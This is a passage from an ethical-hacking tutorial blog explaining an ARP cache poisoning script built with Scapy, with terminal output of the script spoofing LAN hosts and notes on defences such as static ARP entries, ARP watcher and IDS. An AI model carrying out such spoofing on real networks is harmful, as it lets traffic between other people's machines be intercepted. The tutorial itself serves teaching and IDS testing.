    The function sniff() reads packets in an endless loop from the interface specified by the parameter iface. The received packets are automatically filtered by the PCAP filter arp that guarantees that our callback function arp_poison_callback will only get called with ARP packets as input. Due to the parameter store=0 the packet will only be saved in memory but not on the hard disk. The function arp_poison_callback() handles the real work of our program.

    First of all it checks the OP code of the ARP packet: when it’s 1 the packet is an ARP request and we generate a response packet, that has the source MAC and IP of the request packet as destination MAC and IP. We don’t define a source MAC thus Scapy automatically insert the addresses of the sending network interface.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$                                                                                                                                                                                     
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ sudo python3 arpcache-2.py wlan0 
    Fooling 192.168.122.45 that 192.168.122.158 is me
    .
    Sent 1 packets.
    Fooling 192.168.122.158 that 192.168.122.25 is me
    .
    Sent 1 packets.
    Fooling 192.168.122.45 that 192.168.122.158 is me
    .
    Sent 1 packets.
    Fooling 192.168.122.45 that 192.168.122.158 is me
    .
    Sent 1 packets.
    Fooling 192.168.122.158 that 192.168.122.25 is me
    .
    Sent 1 packets.
    Fooling 192.168.122.45 that 192.168.122.158 is me
    .
    Sent 1 packets.
    ^C                                                                                                                                                                                          ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$    
    
    
    




    The IP to MAC resolution of ARP will get cached for some time, because it would be dump to ask for the resolution of the same address over and over again. This ARP cache can be displayed with the following command.



    arp -an



    It depends on the operating system, its version and local configuration settings on how long addresses will get cached.

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ arp -an                                                                                                                                                                       148 ⨯ 3 ⚙
    ? (192.168.122.158) at e6:e4:e4:95:1e:27 [ether] on wlan0
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$              
    
    
    
    


    To defend ARP poisoning attacks one could on one side use static ARP entries, but those could get overwritten by received ARP responses depending on the ARP handling code of the operating system on the other side one could use a tool such as ARP watcher).  

     

     

     

    arp cache

     

     

     

    ARP watcher keeps an eye on the ARP traffic and reports suspicious behavior but will not prevent it. Nowadays most modern Intrusion Detection Systems can detect ARP cache poisoning attacks. You should check the
    functionality of your IDS by using the above scripts to see how it behaves.

     

    To be Continued......



    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.